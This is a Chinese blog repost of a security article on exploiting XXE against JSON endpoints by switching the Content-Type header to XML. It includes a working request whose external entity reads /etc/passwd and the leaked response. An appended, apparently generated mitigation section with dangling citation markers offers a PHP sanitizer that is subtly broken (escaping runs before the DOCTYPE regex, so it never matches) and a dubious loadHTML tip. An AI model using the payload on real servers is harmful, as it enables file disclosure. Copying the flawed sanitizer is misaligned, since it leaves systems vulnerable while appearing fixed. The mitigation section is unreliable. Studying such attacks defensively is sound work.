[转]Playing with Content-Type – XXE on JSON Endpoints

本文探讨了如何将JSON转换为XML格式,并利用此特性绕过服务器的XML解析器设置,进而进行XXE漏洞攻击。通过改变Content-Type头,攻击者可以将原本的JSON请求伪装成XML请求,从而尝试利用服务器对不同格式数据处理的不一致性,实现对服务器文件系统的读取或远程访问。文章详细介绍了攻击过程,包括XML文档结构、DOCTYPE定义以及如何构造有效的XML payload来触发XXE攻击。同时,文章还提供了解决方案,如禁用XML解析或调整服务器配置以增强安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文地址:

Many web and mobile applications rely on web services communication for client-server interaction. Most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may accept data formats that the developers did not anticipate. This may result in JSON endpoints being vulnerable to XML External Entity attacks (XXE), an attack that exploits weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS. XXE attacks rely on inline DOCTYPE definitions in the XML payload. In the following example, an external entity pointing to the /etc/passwd file on the web server is declared and the entity is included in the XML payload:

[quote]<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
[some xml content..]
<element>&xxe;</element>
[some xml content..][/quote]
It’s a simple and neat attack. Time to play with the Content-Type header and HTTP request payloads to see if this could be exploited against JSON endpoints as well. A sample JSON request is listed below, with the Content-Type set to application/json (with silly sample data and most HTTP headers removed):
[quote]
HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}[/quote]
If the Content-Type header is changed to application/xml instead, the client is telling the server that the POST payload is XML formatted data. But if it’s not, the server will not be able to parse it may display an error similar to the following:

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Request:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}[/quote]
The error indicates that the server is able to process XML formatted data as well as JSON formatted data but as the data wasn’t actually XML formatted like stated in the Content-Type header, it cannot be parsed. To overcome this, JSON has to be converted to XML. There are multiple online tools for that, and Eric Gruber created a Burp plugin to automate the conversion in Burp (Content-Type Converter).

[quote]Original JSON

{"search":"name","value":"netspitest"}

XML Conversion

<?xml version="1.0" encoding="UTF-8" ?>
<search>name</search>
<value>netspitest</value>[/quote]
However, this straight up conversion results in an invalid XML document as it does not have a root element that’s required in well formatted XML documents. If the invalid XML is sent to the server. sometimes the server will respond with an error message stating what kind of root element was expected, along with the namespace. Otherwise the best guess is to add root element <root> which makes the XML valid.

[quote]<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>[/quote]
Now the original JSON request can be sent as XML and the server may return a valid response:

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 112

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}[/quote]
As the server accepts XML input, XXE can be exploited against a JSON endpoint.

[quote]HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....[/quote]
Obviously, not every JSON endpoint accepts XML; changing the Content-Type header may not have any impact, or it may result in 415 Unsupported Media Type error message. But on the other hand, JSON to XML attacks are not limited to just POST payloads with JSON content. I have seen this work on JSON formatted GET and POST parameters as well. If the JSON parameter is converted and sent as XML, the server will guess what the content type is.

So, to harden a JSON endpoint, XML parsing should be disabled altogether and/or inline DOCTYPE declarations should be disabled to prevent XML external entity injections.
### 关于 Pikachu-Master 项目中的 XXE 漏洞 #### 解决方案概述 针对 Pikachu-Master 项目中存在的 XML 外部实体 (XXE) 漏洞,主要的防护措施集中在防止恶意输入被解析器处理以及限制外部资源访问。具体来说: - **禁用外部实体扩展**:通过配置应用程序使用的 XML 解析库来阻止其加载来自外部的 DTD 实体声明[^3]。 - **验证并清理用户输入**:确保所有接收自用户的 XML 数据都经过严格的模式校验或白名单过滤机制,从而排除潜在危险字符和结构。 - **采用安全编码实践**:遵循 OWASP 推荐的安全开发指南,在编写涉及文件操作、网络请求等功能模块时特别注意防范注入类风险。 #### 技术实现细节 对于 PHP 应用程序而言,可以通过设置 `libxml_disable_entity_loader(true)` 来关闭默认开启的外部实体加载功能,这一步骤应当尽可能早地执行以覆盖整个应用生命周期内的所有 XML 解析活动[^4]。 另外一种方法是在服务器端对上传的内容进行预处理,移除不必要的 DOCTYPE 声明部分,并替换掉可能引起问题的标准实体引用形式,例如下面这段代码展示了如何利用正则表达式完成这一任务: ```php <?php function sanitize_xml($input){ $pattern = '/<!DOCTYPE.*?>/'; return preg_replace($pattern, '', htmlspecialchars($input)); } ?> ``` 此外,还可以考虑引入专业的第三方组件如 [XMLReader](https://www.php.net/manual/en/book.xmlreader.php),它提供了更细粒度控制的能力用于读取大型 XML 文档而不必一次性将其全部载入内存中;同时配合使用 [DOMDocument::loadHTML()](https://www.php.net/manual/en/domdocument.loadhtml.php) 方法代替原始的 load 函数也能有效规避某些类型的 XXE 攻击向量。 #### 预防建议 为了进一步降低遭受此类攻击的可能性,开发者还应该定期审查依赖项是否存在已知漏洞,并及时更新至最新版本;保持良好的日志记录习惯以便快速响应异常情况的发生;最后也是最重要的一点就是加强团队内部关于 Web 安全意识方面的培训教育工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值